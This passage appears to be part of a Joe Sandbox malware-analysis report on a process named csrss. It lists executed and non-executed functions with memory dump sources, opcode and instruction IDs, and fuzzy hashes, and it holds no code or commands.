                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69fe0d27bcc54100c7eb73bc0795039d5b1b8167bb4d2690dfc24d7627c0b033
                                      • Instruction ID: f7282aefd95296df17e666dfde4082de80ade4dba6022c9e029d0772b943cac0
                                      • Opcode Fuzzy Hash: 69fe0d27bcc54100c7eb73bc0795039d5b1b8167bb4d2690dfc24d7627c0b033
                                      • Instruction Fuzzy Hash: 3C01C872E0C9298FE794FE58C8643B87399FB54310F2502F9D45DC72C6DD2868454782
                                      Function 00007FFB4AE4D4FC Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2552f08c84654de098d30ce662119e0fecb45ec2db9150b0a64425f56e99f83d
                                      • Instruction ID: 7134e7847b37e5e0234674baaae1e90529c794c74cbf766b6a0a50ee0c6c8b5c
                                      • Opcode Fuzzy Hash: 2552f08c84654de098d30ce662119e0fecb45ec2db9150b0a64425f56e99f83d
                                      • Instruction Fuzzy Hash: A5019AB1F085298BEB55FE69D9853F972EEFB94318F3440B1D01A96188CD3DE8428B91
                                      Function 00007FFB4AE25600 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 829d7d1b0271768a37079f42b93237eab7f10810aa9d72ed7acc70c783587473
                                      • Instruction ID: bf1df95fba69eea1843e794ddbdfaa7b021d63e488866094df4a6f18711b4e07
                                      • Opcode Fuzzy Hash: 829d7d1b0271768a37079f42b93237eab7f10810aa9d72ed7acc70c783587473
                                      • Instruction Fuzzy Hash: 11F09E6271DA5647D70CBA7CD8660F4B384FF9732638C82F6C54AC9283DD15988B87D1
                                      Function 00007FFB4AE240A6 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42be8bcee5bb97536e479307a9896c20c9d7952370e2312632e6603a289dc43e
                                      • Instruction ID: b0ba49e7f8b12ba977c1a7f3bb206caeec7ef4bf6ec5452428a5347f19db47cc
                                      • Opcode Fuzzy Hash: 42be8bcee5bb97536e479307a9896c20c9d7952370e2312632e6603a289dc43e
                                      • Instruction Fuzzy Hash: 4B019EB1A1DA0B8BE715FF68C8645FD7BB5FB44310F2002B6C02A97195CE7828048782
                                      Function 00007FFB4AE24081 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60125ad634c16340fbc922307d857387f12144fe9ff5e2c82eac939a1ba9d5b8
                                      • Instruction ID: 62b128802187e459bd1f9b426ed6edcec7dbded50314596f23933298077b7668
                                      • Opcode Fuzzy Hash: 60125ad634c16340fbc922307d857387f12144fe9ff5e2c82eac939a1ba9d5b8
                                      • Instruction Fuzzy Hash: 0701A7B191861B8BEB15FF58C8246FE77B4FF04310F60427AD026972C8CFB465458782
                                      Function 00007FFB4AE25DB5 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e471e81c6b45092eedc3f19c432f80fa60a2bfd64c0720f2ffd0576fe2c90d9
                                      • Instruction ID: 16c58ca300ab8019f2e292987bb144fd14711a701125f9fe59fe1e873f9ea3fb
                                      • Opcode Fuzzy Hash: 7e471e81c6b45092eedc3f19c432f80fa60a2bfd64c0720f2ffd0576fe2c90d9
                                      • Instruction Fuzzy Hash: 9B01A5B0D5C9698FDBD4FF28C995BA8B6A1FB68300F2041E5D41DD3285CE3869858F41
                                      Function 00007FFB4AE249AB Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction ID: 2ea1fe3ee4721c6ac62d3cbdf494fea951a6b4f256d9f848cf8c1f432781f854
                                      • Opcode Fuzzy Hash: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction Fuzzy Hash: 9FF054B2A5C95B4BF755BE2CD9606B93298FF19310F3542F5E43DC71C6EE28E8014682
                                      Function 00007FFB4AE4A7E9 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction ID: eb08d1d0e9e519e8c34edc9bc61880866140a6f7e2ac57b6a0f11600102a4089
                                      • Opcode Fuzzy Hash: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction Fuzzy Hash: 00F0E522B4DBC84FC729AA2D4869061BFF5DB9B21234941FFC496C72E3ED58AC858341
                                      Function 00007FFB4AE4AE10 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 954d8d318abeaa0d577ff7ffd884ea5b9a5c9026ffd804b41dfb8a5485d24aff
                                      • Instruction ID: 8343a8f57aa2d6b753f8121c5a043b9854e683e5299485d6a50963d94df6e1bf
                                      • Opcode Fuzzy Hash: 954d8d318abeaa0d577ff7ffd884ea5b9a5c9026ffd804b41dfb8a5485d24aff
                                      • Instruction Fuzzy Hash: 29F0B472A489158FE3A4BE18C4547A873DAFB94364F690176D029C3195DE6868815740
                                      Function 00007FFB4AE4A379 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction ID: dd883564e53e479445ebf6156c541233331ba38a00a062757bf747cc0926c757
                                      • Opcode Fuzzy Hash: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction Fuzzy Hash: E0E02B7150E7C04FC705AA3484594947FA0EFA721134942EFC045CF1E3EA2CCC89C700
                                      Function 00007FFB4AE4A2E9 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction ID: 1bab3d9375fd886bab1a6da384e0890cf31466f9860bcf7a427805b36666ecb0
                                      • Opcode Fuzzy Hash: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction Fuzzy Hash: 14F0E57150E7C04FC706AA3888294507FA0EF6721134A46EFC045CF1E3EA2D8C88C701
                                      Function 00007FFB4AE16703 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07ccdd97c577f48f3941c78a66be06671470c693810cae01577c0ba69cc20537
                                      • Instruction ID: 1278add93ec383d6484bdd34daef4e51aa079da03f73c5c48dc2b686de4c3342
                                      • Opcode Fuzzy Hash: 07ccdd97c577f48f3941c78a66be06671470c693810cae01577c0ba69cc20537
                                      • Instruction Fuzzy Hash: 26F0A0A2D4DA6A8BF295BE2885192B81AD9FB18220F7981F7C86CC72E6DD0C1C414741
                                      Function 00007FFB4AE10C6C Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Function 00007FFB4AE47764 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction ID: 7d9b2f4199c3c34ede9515398215e465beb115fe01245bc273b6c29d1eed1104
                                      • Opcode Fuzzy Hash: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction Fuzzy Hash: 5CE0E56198E7D04FC74B9B7488688947FB4EE5722178A84EEC0898F1E3D669984AC742
                                      Function 00007FFB4AE4D679 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction ID: 437ef8355eb90a2483f1e29550f55d8ce66b73da8277851049454e5fcd509aa5
                                      • Opcode Fuzzy Hash: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction Fuzzy Hash: 46E01A6284E7C04FCB0A9A7488A88903F64EF6721179A40EBC045CF5A3D9198849C701
                                      Function 00007FFB4AE246B2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Function 00007FFB4AE4A390 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE4A300 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE154B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Function 00007FFB4AE4D6F9 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction ID: 45e2eebe902de0fd7e1acde84c48574b031983042b5d42cafd33742a365dc4fd
                                      • Opcode Fuzzy Hash: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction Fuzzy Hash: 2AE01A6294E7C44FC74BAB3488A89417F64AE1721174A40EBC085CF1F3D9199849C711
                                      Function 00007FFB4AE25538 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4806e51048247fde821f6533b3498d0b21e3966a5f0dc8d16b9f49d73ddff0f2
                                      • Instruction ID: 2468b9840001523653c5bbfdc41d1dbff6d49cd0cf196cdff2bda60ff2e3cb7c
                                      • Opcode Fuzzy Hash: 4806e51048247fde821f6533b3498d0b21e3966a5f0dc8d16b9f49d73ddff0f2
                                      • Instruction Fuzzy Hash: C6D0C930A649084F8B4CBA3C885997472D1EBAE216BE540A9D00AC72A1EA6AD889C741
                                      Function 00007FFB4AE43EC0 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFB4AE41E10 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFB4AE46D78 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 9de1e2994fea26cdf7ad3255474e1c9d0e7d0ee054989b0168b0aa26bfda795c
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 26D01234B949044F870CBA38C85D8747395EB6A2177E544A9D00AC72B1D96ADC89CB81
                                      Function 00007FFB4AE4B618 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: 8f09ab4a651fb39573b1301ec7c35e3ecac32723bf79141849bfce3baf0314c2
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Function 00007FFB4AE106AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Function 00007FFB4AE112B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Function 00007FFB4AE136E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0b7baed9546aedf059e9c09341ca52bdce29be299150096c6c83c7b44ed500c
                                      • Instruction ID: 2ca786c2de6076960dbed5cf218fb85abcf9c31e1b73a1d3c0586f4d3fe9f410
                                      • Opcode Fuzzy Hash: b0b7baed9546aedf059e9c09341ca52bdce29be299150096c6c83c7b44ed500c
                                      • Instruction Fuzzy Hash: E8C08C80E0DC2A53F12B3628C22127E04629F40700FE40078E42EE22CECE0E19221282
                                      Function 00007FFB4AE106D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Function 00007FFB4AE11958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE109B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5

                                      Executed Functions

                                      Function 00007FFB4AE41125 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: 0c43685066546f17239d7422597f6194f38f823e73c115bc5f33f5865da47fe1
                                      • Instruction ID: 3ee000f90a2844165aed432a9d48e7f96db350781fde9014eb84091efbbce81e
                                      • Opcode Fuzzy Hash: 0c43685066546f17239d7422597f6194f38f823e73c115bc5f33f5865da47fe1
                                      • Instruction Fuzzy Hash: E6C19A61A9D6760BE71D7E388E420B5779EFBD2201B3886BDD4EBC7187D91CE4034281
                                      Function 00007FFB4AE10D48 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
